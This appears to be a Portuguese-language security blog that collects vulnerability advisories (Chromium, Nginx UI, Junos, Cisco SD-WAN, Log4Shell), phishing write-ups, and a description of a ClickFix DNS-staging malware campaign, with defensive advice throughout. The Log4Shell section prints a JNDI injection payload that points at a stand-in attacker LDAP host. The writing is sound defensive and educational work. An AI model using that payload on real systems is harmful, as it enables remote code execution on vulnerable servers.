Alerta de segurança: navegadores baseados em Chromium exigem atualização imediata

Duas falhas críticas foram identificadas no navegador Google Chrome e demais navegadores baseados em Chromium: CVE‑2026‑3909 (Skia) e CVE‑2026‑3910 (V8). Ambas já estão sendo exploradas em ataques reais e receberam pontuação CVSS 8.8.

  • CVE‑2026‑3909 – falha de escrita fora dos limites (out‑of‑bounds write) na biblioteca gráfica Skia, podendo levar a corrupção de memória e eventual execução de código arbitrário ao visitar páginas HTML especialmente preparadas.
  • CVE‑2026‑3910 – falha de implementação no motor JavaScript/WebAssembly V8, permitindo execução de código dentro da sandbox do navegador a partir de páginas maliciosas.

Esses tipos de falhas são vetores frequentes de ataques e representam risco significativo para a infraestruturas.

Sobre Navegadores, Skia e V8

Skia é a biblioteca de gráficos 2D usada como motor de renderização (texto, imagens, formas) no Chrome/Chromium, ChromeOS, Android, Flutter e outros produtos, escrita em C++ e mantida pela Google, fornecendo uma camada comum de APIs gráficas multiplataforma.

V8 é o motor de JavaScript e WebAssembly de alto desempenho do Chrome/Chromium (também usado no Node.js), escrito em C++, responsável por analisar, compilar JIT e executar código JavaScript, implementando o padrão ECMAScript e rodando em múltiplas arquiteturas.

Atualmente, mais de 70% dos navegadores desktop usam Chromium devido à compatibilidade com sites modernos. Uma lista não exclusiva inclui: Google Chrome, Microsoft Edge, Brave, Perplexity Comet, Opera e Vivaldi.

Atenção especial deve ser dada aos navegadores agênticos (com capacidades de IA autônoma para tarefas como navegação, compras ou automação) baseados em Chromium/Chrome. Os principais são:

  • Arc Browser: Integra IA para resumir páginas, responder perguntas e gerenciar abas automaticamente.
  • SigmaOS: Agente de IA que navega e executa fluxos de trabalho por comandos naturais.
  • Comet Browser: Focado em automação agêntica para produtividade e tarefas online.
  • Undetectable.io: Chromium modificado para perfis agênticos em multi-contas e anonimato.

Esses usam o motor Blink/V8 do Chromium com extensões de IA, ideais para cenários de automação, mas exigem atualizações essas CVEs recentes.

Solução

Atualização imediata dos navegadores baseados em Chromium.

O Google publicou atualização emergencial do Chrome, corrigindo as duas vulnerabilidades nas versões ≥ 146.0.7680.75 (Windows e Linux) e ≥ 146.0.7680.76 (macOS), com correção específica também para Android.

Navegadores baseados em Chromium (por exemplo, Microsoft Edge, Brave, Opera, Comet, etc) devem receber atualizações equivalentes de seus respectivos fornecedores.

Outras ações recomendadas

  • Inventariar estações, notebooks e servidores que utilizem Chrome ou outros navegadores baseados em Chromium, incluindo quiosques, laboratórios e máquinas de uso compartilhado.
  • Acelerar o ciclo de patching para endpoints críticos, usuários privilegiados, equipes administrativas e ambientes com maior exposição à navegação externa.
  • Reforçar monitoramento em EDR, proxy e firewall para comportamentos suspeitos originados de processos de navegador (spawns de shells, conexões persistentes incomuns após crash do navegador, acesso a páginas com JavaScript fortemente ofuscado ou imagens/payloads atípicos).
  • Divulgar orientação aos usuários para reiniciar o navegador após a atualização, evitar atrasar a instalação de patches e manter atenção a comportamentos anômalos do browser (travamentos repetidos, janelas estranhas, redirecionamentos inesperados).

Enquanto a correção não for plenamente aplicada, estações desatualizadas devem ser consideradas em estado de risco elevado para comprometimento via navegação web, haja visto que nesse momento (13/3/2026 18:30 GMT-3) há indícios de exploração ativa.

Nota de transparência: Este artigo NÃO utilizou de ferramentas de Inteligência Artificial Generativa para sua escrita, exceto para realização de pesquisa e validação de referências. Os demais o conteúdos foram elaborados e revisados pelo autor.

Atualizações ambiente Microsoft Windows 11 / Server

As atualizações mensais da Microsoft, conhecidas como Patch Tuesday, tem uma importante função, corrigir vulnerabilidades que podem ser exploradas por atacantes para comprometer ativos de ambientes corporativos ou pessoais. A última atualização, março de 2026 é um exemplo claro dos riscos de se manter sistemas desatualizados.

Conforme o release note da atualização, corrige 79 vulnerabilidades de segurança, incluindo duas falhas zero-day divulgadas publicamente, além de vulnerabilidades críticas no Windows 11, Windows Server, Microsoft Office, SQL Server e .NET.

Em detalhe temos:

  • 46 vulnerabilidades de Elevação de Privilégio (EoP)
  • 18 vulnerabilidades de Execução Remota de Código (RCE)
  • 10 vulnerabilidades de Divulgação de Informação
  • 4 vulnerabilidades de Negação de Serviço (DoS)
  • 4 vulnerabilidades de Spoofing
  • 2 vulnerabilidades de Bypass de Recursos de Segurança

Pontos de atenção

Vulnerabilidades Zero-Day
Duas vulnerabilidades zero-day divulgadas publicamente, ou seja, falhas cujo funcionamento já era conhecido antes da liberação do patch.

    CVE-2026-21262 – SQL Server (Elevação de Privilégio)
    Permite que um usuário autenticado eleve seus privilégios para SQL Admin (sysadmin) remotamente. Essa falha pode resultar em controle total de bases de dados críticas, comprometendo confidencialidade e integridade das informações.

    CVE-2026-26127 – .NET (Negação de Serviço)
    Falha causada por leitura fora dos limites de memória, permitindo que um atacante cause indisponibilidade de serviços que dependem de aplicações .NET.

    Vulnerabilidades Críticas no Microsoft Office

      CVE-2026-26110 e CVE-2026-26113 – Microsoft Office (RCE)
      Essas vulnerabilidades podem ser exploradas apenas com a visualização do arquivo no Painel de Visualização, sem que o usuário precise abrir o documento. Isso representa um risco elevado de ataques por phishing e e-mails maliciosos.

      CVE-2026-26144 – Microsoft Excel (Information disclosure)
      Permite vazar dados sensíveis e chamou atenção por possível exploração via Microsoft Copilot.

      Elevação de Privilégio no Windows e Windows Server
      A maioria das vulnerabilidades corrigidas está relacionada à elevação de privilégio, afetando componentes centrais do Windows, como:

        Windows Kernel, Windows SMB Server, Winlogon e Windows DWM Core Library.

        Alerta de segurança: vulnerabilidade crítica no Nginx UI

        Foi divulgada uma vulnerabilidade crítica no Nginx UI, painel web para administração do servidor web Nginx, registrada como CVE-2026-27944 e com pontuação CVSS 9.8 (Critical).

        NOTA IMPORTANTE:Nginx UIé um projeto open-source complementar e não oficial ao Nginx, hospedado no GitHub em 0xJacky/nginx-ui. Ele é uma interface gráfica para administração do Nginx e possui cerca de 9.6k estrelas de avaliação no GitHub, mas não há dados públicos de adoção em larga escala, contrastando com o market share global do Nginx core que é cerca de 33% dos servidores web existentes na Internet.

        Se você não utiliza Nginx UI você pode parar de ler esse alerta nesse pronto. Caso contrário, continue.


        A falha do Nginx UI permite que um atacante não autenticado baixe e decripte um full backup do sistema, expondo credenciais, tokens de sessão, chaves privadas SSL/TLS e configurações completas do Nginx e do próprio Nginx UI.

        Fontes mencionam explicitamente que pesquisadores já lançaram um script PoC que automatiza o envio do GET para /api/backup, extrai a chave e o IV do cabeçalho X-Backup-Security e faz a decriptação local do backup.

        Com isso, a exploração é de baixa complexidade e totalmente automatizável, o que aumenta bastante a urgência de correção

        A ação mais imediata, rápida e efetiva é:

        Atualizar imediatamente o Nginx UI para a versão 2.3.3 ou superior, que contém o patch oficial da CVE‑2026‑27944 e corrige tanto a falta de autenticação no /api/backup quanto a exposição das chaves de criptografia no cabeçalho X-Backup-Security.

        Se a atualização não puder ser aplicada na hora, o mínimo é bloquear o acesso ao /api/backup e à interface do Nginx UI a partir de redes não confiáveis (Internet) via firewall, ACL ou reverse proxy, até concluir o patch.

        Caso a solução imediata seja viável, ela resolve o problema. Continue lendo se quiser entender os detalhes.

        Resumo técnico da vulnerabilidade

        O Nginx UI expõe um endpoint de backup em /api/backup, concebido originalmente para que administradores autenticados baixem backups criptografados do sistema.
        Em versões anteriores à 2.3.3, este endpoint pode ser acessado sem qualquer autenticação, caracterizando um caso clássico de Missing Authentication for Critical Function (CWE-306).

        Além da ausência de autenticação, o endpoint retorna no cabeçalho HTTP X-Backup-Security as informações necessárias para decriptar o backup (chaves/segredo de criptografia), o que neutraliza totalmente a proteção oferecida pela criptografia aplicada ao arquivo.

        Na prática, um atacante precisa apenas enviar uma requisição HTTP para /api/backup, receber o arquivo de backup e ler a chave de descriptografia no cabeçalho da resposta para ter acesso imediato a todos os dados sensíveis contidos ali.

        De acordo com os advisories públicos, o backup pode conter:

        • Credenciais de usuários do Nginx UI.
        • Tokens de sessão.
        • Chaves privadas SSL/TLS.
        • Arquivos de configuração do Nginx.
        • Demais segredos e parâmetros sensíveis do ambiente.

        Impacto

        O impacto é crítico em qualquer cenário em que o Nginx UI esteja acessível a partir de redes não confiáveis (por exemplo, exposto diretamente à Internet).
        Um comprometimento via CVE-2026-27944 tende a resultar em comprometimento completo da instância de Nginx UI e potencialmente dos serviços HTTP(s) servidos pelo Nginx, uma vez que chaves privadas e configurações podem ser reutilizadas para ataques de hijack, impersonation e movimento lateral.

        Como já existe código de prova de conceito público para exploração, o nível de risco aumenta e a janela entre divulgação e exploração em massa tende a ser curta.

        Versões afetadas e correção

        • Produto afetado: Nginx UI (0xJacky/nginx-ui).
        • Versões vulneráveis: todas as versões anteriores à 2.3.3.
        • Versão corrigida: 2.3.3, na qual o endpoint /api/backup passa a exigir autenticação adequada e deixa de expor as chaves de criptografia no cabeçalho de resposta.

        Os mantenedores recomendam atualização imediata para a versão 2.3.3; distribuições e fornecedores de appliances podem liberar patches ou backports específicos, portanto também é importante acompanhar os comunicados do seu fornecedor.

        Relação com vulnerabilidades anteriores

        Esta não é a primeira vez que o Nginx UI é alvo de vulnerabilidades severas: em 2024 foi divulgada a CVE-2024-22198, que permitia execução de comandos arbitrários autenticados ao abusar configurações expostas na página Home > Preference, como o parâmetro Terminal Start Command.

        Embora esse bug exigisse autenticação (PR:L), ele mostrava um padrão de exposição de funções sensíveis via API, exploradas através de requisições diretas e não necessariamente pela UI, algo que volta a aparecer na CVE-2026-27944 com impacto ainda maior por ser não autenticada.

        Referências:

        Alerta de Segurança: Vulnerabilidade Crítica de Execução Remota de Código no Junos OS Evolved

        Resumo Executivo

        Uma vulnerabilidade crítica de segurança, identificada como CVE-2026-21902, foi descoberta no framework de detecção de anomalias On-Box do Junos OS Evolved da Juniper Networks. A falha, que possui uma pontuação CVSS de 9.8 (Crítica), permite que um atacante não autenticado com acesso à rede execute código arbitrário como root em roteadores da série PTX afetados, levando ao comprometimento total do dispositivo. Não há evidências de exploração ativa até o momento (27/2/2026).

        Informações Gerais

        Detalhe:Descrição
        CVE IDCVE-2026-21902
        CVSS (Gravidade)9.8 (Crítica)
        EPSS (Probabilidade de Exloração)0.25 % (Improvável – 27/2/2026)
        Vetor de AtaqueRede
        AutenticaçãoNão requerida
        ImpactoExecução Remota de Código (RCE) como root
        CWE[CWE-732]: Atribuição Incorreta de Permissões para um Recurso Crítico

        De acordo com as informações que temos, a falha foi descoberta internamente pela Juniper Networks. A data exata de descoberta não foi divulgada publicamente. O que sabemos sobre as datas importantes são:

        • Data de Publicação NVD: 25 de fevereiro de 2026
        • Data da Última Modificação NVD: 27 de fevereiro de 2026
        • Data do Boletim de Segurança: 27 de fevereiro de 2026 (lançamento do patch de emergência)

        A Juniper Networks confirmou que não há evidências de exploração ativa até o momento da divulgação pública. Por esses motivos, o EPSS dessa vulnerabilidade é baixo (0,25%), no momento de elaboração desse alerta, mas o panorama pode se alterar rapidamente. Entretanto, o boletim de segurança foi lançado como uma atualização fora do cronograma (out-of-band), indicando a urgência da correção.

        Descrição Detalhada da Vulnerabilidade

        A vulnerabilidade resulta de uma atribuição incorreta de permissões no framework de detecção de anomalias On-Box. Este serviço, que deveria ser acessível apenas por processos internos através de uma instância de roteamento interna, está exposto a redes externas. Um atacante pode explorar essa falha para acessar e manipular o serviço, permitindo a execução de código com privilégios de root e, consequentemente, obtendo controle total sobre o roteador.

        É importante notar que o serviço vulnerável está ativado por padrão e não requer nenhuma configuração específica para estar exposto, ampliando o risco para os sistemas afetados.

        Sistemas Afetados

        A vulnerabilidade afeta exclusivamente as seguintes versões do Junos OS Evolved em roteadores da série PTX:

        • Versões da linha 25.4 anteriores a 25.4R1-S1-EVO e 25.4R2-EVO.

        Versões do Junos OS Evolved anteriores à 25.4R1-EVO e o Junos OS padrão não são afetadas por esta vulnerabilidade.

        Mitigação e Recomendações

        A Juniper Networks lançou atualizações de software para corrigir esta vulnerabilidade. Recomenda-se que os administradores de sistemas apliquem os patches o mais rápido possível.

        Atualizações de Software

        Atualize o Junos OS Evolved para uma das seguintes versões, ou posteriores:

        • 25.4R1-S1-EVO
        • 25.4R2-EVO
        • 26.2R1-EVO

        Medidas de Mitigação Temporárias

        Para organizações que não podem aplicar as atualizações imediatamente, as seguintes medidas podem reduzir o risco de exploração:

        1. Isolamento de Rede: Isole a rede de gerenciamento dos roteadores afetados para limitar o acesso.
        2. Restrição de Acesso: Restrinja o acesso à porta do serviço vulnerável a partir de fontes não confiáveis.
        3. Monitoramento de Logs: Monitore os logs do sistema para detectar qualquer atividade suspeita que possa indicar uma tentativa de exploração.

        Impacto Potencial

        A exploração bem-sucedida desta vulnerabilidade pode ter consequências graves. Como destacado, o comprometimento de um roteador PTX pode ir além do próprio dispositivo. Um atacante pode usar o roteador como um ponto de observação para interceptar o tráfego de rede, redirecionar dados ou como um pivô para lançar ataques a outras redes adjacentes.

        Embora a Juniper Networks não tenha conhecimento de exploração ativa desta vulnerabilidade até o momento, a criticidade da falha exige atenção imediata.

        Referências

        [1] National Vulnerability Database. (2026). CVE-2026-21902 Detail.

        [2] MITRE. (2023). CWE-732: Incorrect Permission Assignment for Critical Resource.

        [3] SecurityWeek. (2026). Juniper Networks PTX Routers Affected by Critical Vulnerability.

        [4] Juniper Networks. (2026). 2026-02 Out-of-Cycle Security Bulletin: Junos OS Evolved: PTX Series.

        Alerta: Atores Maliciosos Visam Ativamente Controladores Cisco Catalyst SD-WAN

        Resumo Executivo

        Identificamos uma campanha global de ciberataques perpetrada por agentes maliciosos, focada na exploração de vulnerabilidades em dispositivos de rede SD-WAN (Software-Defined Wide Area Network). Os atacantes estão explorando uma falha de segurança crítica nos controladores Cisco Catalyst SD-WAN para obter acesso não autorizado e estabelecer persistência de longo prazo nas redes corporativas.

        Detalhes da Ameaça no Cisco Catalyst

        A vulnerabilidade central, registrada como CVE-2026-20127, consiste em um bypass de autenticação no controlador Cisco Catalyst SD-WAN. Uma vez que a exploração é bem-sucedida, os atores da ameaça conseguem adicionar um dispositivo par (peer) não autorizado à rede. Este ponto de entrada inicial é então utilizado para escalar privilégios, culminando na obtenção de acesso root ao sistema. Com esse nível de controle, os invasores podem garantir sua permanência na infraestrutura SD-WAN, representando um risco significativo e contínuo para a organização.

        Métricas da Ameaça no Cisco Catalyst

        A CVE-2026-20127 possui pontuação CVSS v3.1 de 10.0 (crítica), com vetor AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H.

        Essa pontuação máxima reflete alto impacto em confidencialidade, integridade e disponibilidade, com exploração remota sem autenticação.

        Também há uma métrica CVSS v2 de 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

        O EPSS é de 0.976, indicando alta probabilidade (cerca de 97,6%) de exploração nos próximos 30 dias.

        Esforço Coordenado de Resposta

        Em resposta a esta ameaça, uma coalizão de agências internacionais de segurança cibernética, incluindo a Agência de Segurança Nacional dos EUA (NSA), a Agência de Segurança Cibernética e de Infraestrutura dos EUA (CISA), e os centros de segurança cibernética da Austrália, Canadá, Nova Zelândia e Reino Unido, publicou o Guia de Caça de Vulnerabilidade Exploitation of Cisco SD-WAN appliances“. Este documento, fundamentado em dados de investigações reais, foi desenvolvido para auxiliar os defensores de rede na detecção e resposta às atividades maliciosas.

        Versões Vulneráveis Confirmadas

        As versões afetadas pela CVE-2026-20127 incluem Cisco Catalyst SD-WAN Controller (ex-vSmart) e Manager (ex-vManage) em implantações on-premise e na nuvem hospedada pela Cisco.

        • Antes da versão 20.9.1: Migre para uma release corrigida.
        • 20.9 até 20.9.8.1 (corrigida em 20.9.8.2, estimada para 27/02/2026).
        • 20.12.5 até 20.12.5.2 (corrigida em 20.12.5.3).
        • 20.12.6 até 20.12.6.0 (corrigida em 20.12.6.1).
        • 20.13 até 20.15.4.1 (corrigida em 20.15.4.2).
        • 20.14 até 20.15.4.1 (corrigida em 20.15.4.2).
        • 20.15 até 20.15.4.1 (corrigida em 20.15.4.2).
        • 20.16 até 20.18.2.0 (corrigida em 20.18.2.1).
        • 20.18 até 20.18.2.0 (corrigida em 20.18.2.1).

        Recomendações de Mitigação

        As organizações autoras do guia recomendam enfaticamente que os administradores de rede adotem as seguintes medidas imediatas:

        Ação Recomendada:Descrição:
        Coleta de ArtefatosPreserve evidências cruciais, como snapshots virtuais e logs completos da tecnologia SD-WAN, para análise forense.
        Aplicação de PatchesRevise os boletins de segurança da Cisco: “Cisco Catalyst SD-WAN Vulnerabilities” e “Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability”, e aplique todas as atualizações necessárias para corrigir a vulnerabilidade CVE-2026-20127.
        Caça a Ameaças (Threat Hunting)Execute buscas proativas por evidências de comprometimento, seguindo as diretrizes detalhadas no Guia de Caça.
        Fortalecimento do Ambiente (Hardening)Implemente as melhores práticas descritas no Guia de Fortalecimento do Cisco Catalyst SD-WAN.

        Diretrizes de Fortalecimento (Hardening)

        O guia de hardening da Cisco oferece uma abordagem abrangente para proteger a infraestrutura SD-WAN. As principais recomendações incluem:

        • Controles de Perímetro de Rede: Posicione os componentes de controle atrás de um firewall, isole as interfaces da VPN 512 e utilize blocos de IP para provisionamento manual de dispositivos de borda.
        • Acesso ao Gerenciador SD-WAN: Substitua o certificado autoassinado da interface de usuário web por um certificado emitido por uma autoridade confiável.
        • Segurança do Plano de Controle e Dados: Utilize chaves par a par (pairwise keying) para aumentar a segurança da comunicação.
        • Tempo Limite de Sessão: Configure o tempo de inatividade da sessão para o menor período possível que não prejudique a operação.
        • Gerenciamento de Logs: Encaminhe todos os logs para um servidor syslog remoto e seguro para garantir a centralização e a integridade dos registros.

        Referências

        [1] Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability

        [2] Exploitation of Cisco SD-WAN appliances

        [3] CVE-2026-20127

        You’ve been Log4pwned!

        Já há algum tempo venho participando do processo de Gestão de Vulnerabilidades aqui da CYLO, tem sido uma tarefa desafiadora e, por mais que cada ambiente que eu faço essa gestão tenha as suas individualidades, em quase todos os ambientes me deparo sempre com as mesmas falhas, figurinhas repetidas que estão presentes em 80% dos ambientes, a ideia de escrever esse post é totalmente baseada em descrever essas vulnerabilidades, que eu sei que existem no seu ambiente, mesmo não te conhecendo.

        E para começar, não poderia ser diferente, é impossivel falar de vulnerabilidades críticas que viraram o mundo de cabeça pra baixo, sem citar a tão temida e assustadora CVE-2021-44228. Ou para os intímos Log4shell. O terror dos analistas de SOC em meados de 2021/2022 e em muitos casos, até hoje!

        Se você vive em baixo de uma pedra, e não faz ideia do que estou falando, fique calmo que vou te explicar o que é a vulnerabilidade CVE-2021-44228, qual produto ela afeta, e como ela é explorada por agentes de ameaça.

        Descrição da vulnerabilidade

        Log4Shell (CVE-2021-44228) é uma falha na biblioteca de logging Java Log4j desenvolvida pelo Apache afetando as versões 2.0-beta9 até 2.15 (há contradições sobre o primeiro patch de correção dessa vulnerabilidade que, teóricamente foi lançada na versão 2.15 porém o patch não funcionou completamente e em alguns casos específicos ainda era possível realizar a exploração) que simplesmente permitia que QUALQUER texto logado virasse um CÓDIGO EXECUTÁVEL no servidor, mas como isso funciona?

        Na prática, o Log4j permitia que mensagens de log contivessem expressões no formato ${...}, que eram interpretadas automaticamente durante o processamento do log. Uma dessas expressões era ${jndi:...}, relacionada ao JNDI, uma API do Java usado para localizar e obter objetos ou recursos em servidores externos, como serviços de diretório LDAP. Ao processar essa expressão, o Log4j realizava uma consulta ao servidor indicado e podia carregar o conteúdo retornado.

        Exploração da CVE-2021-44228

        Agora, entendendo onde está a falha na biblioteca Log4j presente no servidor Apache vulnerável. Quando o atacante identifica essa condição, ele passa à exploração (e acredite ele vai explorar), fazendo com que a aplicação registre em log algum dado controlado pelo atacante (como cabeçalho HTTP User-Agent ou campo de login) contendo uma expressão JNDI maliciosa, aqui vai um exemplo de uma requisição maliciosa:

        ${jndi:ldap://servidor-do-atacante/mimikatz.exe}.

        Quando o Log4j processa esse log, ele irá interpretar a expressão ${jndi:...} e usa o JNDI para consultar o servidor LDAP do atacante, que responde com uma referência a uma classe Java remota. A JVM da aplicação então baixa e carrega essa classe, executando o código nela contido no contexto do processo vulnerável, resultando em um RCE que vai te dar pesadelos.

        Relevância da vulnerabilidade CVE-2021-44228

        Após entender o que é a falha representada pela CVE-2021-44228, e entender como atacantes realizam sua exploração, pergunto. Por que se preocupar tanto com essa vulnerabilidade? qual sua relevância? afinal existem milhares de outras falhas que descrevem a possibilidade de um RCE em outros produtos.

        O motivo é bem simples, e preocupante. Mesmo após mais de 5 anos desde sua descoberta, a vulnerabilidade Log4Shell ainda possui um EPSS de 94.36% e um CVSS score que pessoalmente acredito que nunca irá abaixar de 10/10, dados esses que foram coletados no dia 26/02/2026, refletindo um cenário em que ainda há milhares se não milhões de aplicações vulneráveis a CVE-2021-44228, e que estão ativamente sendo explorados todos os dias, afinal é facil de explorar, em muitos casos, não necessitando de privilégios elevados, literalmente o paraíso dos Adversários.

        Portanto, se quiser dormir tranquilo, certifique-se de atualizar o Log4J da sua aplicação para a versões >= 2.17.1 o quanto antes (tem que ser literalmente para ontem!). E para aqueles que chegaram agora e não fazem ideia se estão com suas aplicações vulneraváveis, não perca mais tempo, pois o atacante provavelmente já tem essa resposta, e ele não vai perder nem um segundo.

        Refêrencias

        CVE-2021-44228 : Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12

        Known Exploited Vulnerabilities Catalog | CISA

        NVD – CVE-2021-44228

        Regularização falsa: golpe de phishing usa CNH como isca

        Na tarde de hoje, meu pai me encaminhou um e-mail sobre a suposta regularização de uma infração em sua CNH. O remetente se identificava como “Regularize CNH”, mas o endereço era claramente incomum para algo que alegava ser do gov.br: store+79974727929@g.shopifyemail.com:

        Ao inspecionar melhor o conteúdo, o botão verde que prometia “resolver o problema” levava para um subdomínio que não pertence ao gov.br: regularize-cnh.myshopfy.com. A partir dessa página, o usuário é redirecionado para uma tela de pagamento em pay.cnhpagamentos.site, onde diversos detalhes entregam a fraude:

        • Botões para aumentar ou diminuir a quantidade de itens “Regularize” no carrinho, permitindo adicionar um número arbitrário de unidades.;
        • Uma seção de identificação do pagador sem qualquer autenticação ou login, algo incompatível com serviços oficiais relacionados à CNH.

        Analisando o código‑fonte da página, é possível encontrar um script em JavaScript que, ao clicar no botão “GERAR PIX”, envia para o gateway de pagamento cffp.cloudfox.net um token que provavelmente identifica a conta que receberá o dinheiro. Em uma busca rápida, descobri que a Cloud Fox atua como gateway de pagamento parceiro da Shopify, plataforma conhecida por hospedar lojas de e-commerce.

        Realizando uma pesquisa rápida, percebi que Cloud Fox é um gateway de pagamento parceiro da Shopfy, uma plataforma de criação e hospedagem de e-commerces.

        O caso reforça o alerta para um tipo de golpe que vem se sofisticando: e‑mails de phishing explorando temas sensíveis, como CNH e multas de trânsito, para induzir pagamentos via PIX. Em situações assim, é fundamental conferir o remetente, verificar se o domínio faz sentido para o serviço citado, inspecionar para onde apontam botões e links e ficar atento a inconsistências nas páginas de destino.

        Phishing: Polícia Civil do Amapá

        Recentemente recebemos um report de um cliente onde havia recebido um e-mail originado da Polícia Civil do Amapá.

        O remetente referência uma pessoa chamda Nashya Ribeiro com o e-mail: nashyaribeiro@policiacivil[.]ap[.]gov[.]br.

        O e-mail gera urgência determinando um prazo de 1 dia informando que os detalhes da solicitação se encontram no PDF

        Passando por uma pesquisa rápida o domínio policiacivil[.]ap[.]gov[.]br é realmente utilizado pela ´Polícia Civil do Amapa – hxxps[://]policiacivil[.]portal[.]ap[.]gov[.]br/pagina/unidades-policiais/especializadas

        Dentro do PDF tem um link no botão instalar certificado que aponta para um endereço que atualmente quando acessado, já se apresenta fora do ar. hxxps[://]195[.]177[.]94[.]193/[.]certificados[.]ap[.]gov[.]br

        O link estava hospedado em um datacenter localizado nos Estados Unidos denominado STELLARGROUP aparentemente de origem Ucraniana.

        Identificamos através de fontes externas que a campanha ainda continua ativa seguindo o mesmo padrão de e-mails e anexos.

        Conhecendo o MITRE | ATT&CK.

        Embora ter ferramentas de proteção são importantes, entender a mentalidade do atacante, como conhecer quais as táticas e métodos utilizados por ele durante um ataque, também é fundamental para os profissionais de cibersegurança.

        Por que utilizar o MITRE ATT&CK? O que é?

        Criado pela MITRE, o ATT&CK é um framework, uma base de conhecimento global gratuita, contendo informações como as táticas, técnicas e procedimentos adotados por cibercriminosos, baseado em estudos de caso real de incidentes, foram identificadas e mapeadas as informações de como os adversários agem e o ciclo de vida de um ataque no ambiente de tecnologia.

        O framework da Mitre ATT&CK foi organizado em um modelo de matriz de domínios tecnológicos, onde buscaram organizar as informações para os comportamentos do adversário, seguindo uma divisão em matrizes de domínios tecnológicos, conforme abaixo:

        • Enterprise ATT&CK: Representando informações para ataques a redes empresariais e tecnologias de nuvem para ambientes corporativos.
        • Mobile ATT&CK: Representando informações para ataques direcionados a dispositivos móveis.
        • ICS ATT&CK: Representando informações para ataques de sistemas de controle industrial (ICS).

        Baseado em sua matriz de domínio tecnológico, foi estruturado as informações dividindo em “táticas, técnicas e subtécnicas” para os comportamentos do adversário, seguindo as definições abaixo:

        • Táticas: Representam o “porque”, seria o objetivo do atacante.
        • Técnicas: Representam o “como”, como alcançar o objetivo definido pelas táticas.
        • Subtécnicas: Seria um nível maior de detalhamento das técnicas e comportamentos do adversário.

        Frameworks como o do Mitre ATT&CK, permitem que as equipes de segurança antecipem movimentos de atacantes e realizem uma proteção de forma proativa nas organizações, antecipando ações maliciosas e ajudando a implementar controles mais eficazes nos ambientes de tecnologia.

        Texto acima foi um breve resumo do que é ATT&CK e podemos encontrar mais informações acessando os endereços: Get Started | MITRE ATT&CK® / MITRE ATT&CK® .

        ClickFix com DNS Staging distribui malware via PowerShell

        A nova campanha de ataque, que possui como alvo o sistema Windows da Microsoft, caracteriza uma evolução do método de engenharia social ClickFix, na qual consultas DNS realizadas por meio do utilitário nativo nslookup são utilizadas como mecanismo de staging e entrega de código malicioso.

        Nesse modelo, respostas DNS são manipuladas para transportar dados codificados que contêm comandos e scripts PowerShell, posteriormente reconstruídos e executados no host comprometido.

        A técnica permite o carregamento progressivo de payloads e a instalação de malware em sistemas Windows, incluindo Remote Access Trojans (RATs) e Infostealers, explorando uma abordagem living-off-the-land que utiliza ferramentas legítimas do sistema operacional.

        O uso do protocolo DNS como canal de transporte contribui significativamente para evasão de detecção baseada em rede, uma vez que o tráfego se mistura a consultas legítimas e frequentemente não é submetido a inspeção profunda em ambientes corporativos.

        A campanha representa uma evolução significativa de ataques baseados em engenharia social, explorando ferramentas legítimas do próprio sistema operacional para contornar mecanismos tradicionais de defesa.

        Cadeia de infecção observada

        O método conhecido como ClickFix baseia-se em engenharia social. A vítima é induzida a executar manualmente comandos apresentados como soluções para supostos problemas técnicos. Normalmente, o usuário recebe instruções para copiar e executar comandos em terminais do Windows, acreditando estar resolvendo um problema legítimo.

        Nesta nova campanha, os atacantes aprimoraram o método ao integrar o uso de consultas DNS como mecanismo de entrega de payload. A cadeia de passos observada tem sido a seguinte:

        • A vítima é levada (por instruções passo a passo em sites, e‑mails ou chats de “suporte”) a abrir o diálogo Executar do Windows (Win+R) ou um terminal e colar um comando aparentemente benigno.
        • Esse comando executa o nslookup apontando NÃO para o resolvedor DNS padrão da máquina, mas para um servidor DNS externo controlado pelo atacante (IP ou domínio hard‑coded no comando).
        • A resposta DNS vem especialmente formatada: o campo “Name:” ou dados de resposta contêm um script PowerShell ou dados codificados que são filtrados e passados diretamente para execução como segundo estágio.
        • O PowerShell então baixa um arquivo ZIP a partir da infraestrutura do atacante, contendo um runtime Python portátil e vários scripts que fazem reconhecimento de host/domínio, instalam persistência e puxam payloads adicionais.

        Por que este ataque é preocupante

        O uso do DNS como canal de entrega aumenta significativamente a capacidade de evasão, pois:

        • O DNS raramente é bloqueado em ambientes corporativos;
        • Em muitas organizações não inspecionam profundamente consultas DNS;
        • As ferramentas utilizadas são nativas do Windows (living-off-the-land).

        Isso reduz a eficácia de soluções tradicionais baseadas apenas em assinaturas ou monitoramento de downloads.

        Recomendações de mitigação

        Organizações e usuários devem adotar medidas preventivas imediatas:

        Para equipes de segurança

        • Monitorar uso incomum de nslookup e PowerShell;
        • Implementar inspeção e logging avançado de tráfego DNS;
        • Detectar consultas DNS com volumes anormais ou respostas longas;
        • Aplicar políticas de execução restrita para PowerShell; e
        • Utilizar EDR/XDR com detecção COMPORTAMENTAL.

        Para usuários

        • Nunca executar comandos sugeridos por sites ou pop-ups;
        • Desconfiar de páginas que pedem ações manuais no terminal; e
        • Validar instruções técnicas apenas em fontes oficiais.

        Conclusão

        A campanha identificada demonstra uma tendência crescente no cenário de ameaças: o abuso de ferramentas legítimas e protocolos essenciais da Internet para contornar mecanismos tradicionais de defesa.

        O uso combinado de engenharia social ClickFix e entrega de payload via DNS reforça a necessidade de estratégias de defesa baseadas em comportamento, telemetria e análise contextual, e não apenas em bloqueios convencionais.